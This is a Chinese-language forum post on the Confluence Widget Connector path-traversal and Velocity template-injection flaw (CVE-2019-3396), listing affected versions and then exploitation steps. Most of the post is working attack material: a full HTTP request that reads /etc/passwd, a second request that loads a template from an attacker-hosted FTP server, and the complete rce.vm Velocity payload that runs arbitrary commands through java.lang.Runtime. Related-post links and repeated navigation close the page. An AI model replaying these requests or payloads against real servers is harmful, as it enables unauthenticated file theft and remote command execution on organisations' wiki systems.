Confluence 路径穿越和命令执行

1.漏洞简介

Atlassian Confluence 是企业广泛使用的 wiki 系统，其 6.14.2 版本前存在一处未授权的目录穿越漏洞，通过该漏洞，攻击者可以读取任意文件，或利用 Velocity 模板注入执行任意命令。

2.影响版本

Confluence 1.*.*、2.*.*、3.*.*、4.*.*、5.*.*

Confluence 6.0.*、6.1.*、6.2.*、6.3.*、6.4.*、6.5.*

Confluence 6.6.* < 6.6.12

Confluence6.7.*、6.8.*、6.9.*、6.10.*、6.11.*

Confluence 6.12.* < 6.12.3

Confluence 6.13.* < 6.13.3

Confluence 6.14.* < 6.14.2

3.利用过程

3.2 路径穿越

payload：

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: XX.XX.XX.XX:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://XX.XX.XX.XX:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 178

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}

3.2 命令执行

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: XX.XX.xx.xx:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://xx.xx.xx.xx:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 210

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://xx.xx.xx.xx:21/rce.vm","command":"ifconfig"}}}

rce.vm 放到 ftp 中

#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

具体操作在：https://github.com/jas502n/CVE-2019-3396

Tomcat AJP 文件包含漏洞（CVE-2020-1938）解决方案（含 Apache ajp 方式）

漏洞原理： Tomcat 配置了两个 Connecto，它们分别是 HTTP 和 AJP ：HTTP 默认端口为 8080，处理 http 请求，而 AJP 默认端口 8009，用于处理 AJP 协议的请求，而 AJP 比 http 更加优化，多用于反向、集群等，漏洞由于 Tomcat AJP 协议存在缺陷而导致，攻击 ..

CVE-2017-8464

情报收集北京时间 2017 年 6 月 13 日凌晨，微软官方发布 6 月安全补丁程序，“震网三代” LNK 文件远程代码执行漏洞 CVE-2017-8464 ，当 Windows 系统在解析快捷方式时，存在远程执行任意代码的高危漏洞，黑客可以通过 U 盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危。 ..

欢迎来到这里！

我们正在构建一个小众社区，大家在这里相互信任，以平等 • 自由 • 奔放的价值观进行分享交流。最终，希望大家能够找到与自己志同道合的伙伴，共同成长。

关于

Confluence 路径穿越和命令执行

1.漏洞简介

2.影响版本

3.利用过程

3.2 路径穿越

3.2 命令执行

相关帖子

CVE-2020-3187(未经身份验证任意文件删除)

Tomcat 和 netty 都爆出了漏洞

Tomcat AJP 文件包含漏洞（CVE-2020-1938）解决方案（含 Apache ajp 方式）

CVE-2017-8464

织梦 CMS 开始收费，大 D 可以布局一下

ThinkPHP 漏洞（根据实战不定时更新）

求推荐一个开源 CMS

欢迎来到这里！

Confluence 路径穿越和命令执行

1.漏洞简介

2.影响版本

3.利用过程

3.2 路径穿越

3.2 命令执行

相关帖子

CVE-2020-3187(未经身份验证任意文件删除)

Tomcat 和 netty 都爆出了漏洞

Tomcat AJP 文件包含漏洞（CVE-2020-1938） 解决方案 （含 Apache ajp 方式）

CVE-2017-8464

织梦 CMS 开始收费，大 D 可以布局一下

ThinkPHP 漏洞（根据实战不定时更新）

求推荐一个开源 CMS

欢迎来到这里！

Tomcat AJP 文件包含漏洞（CVE-2020-1938）解决方案（含 Apache ajp 方式）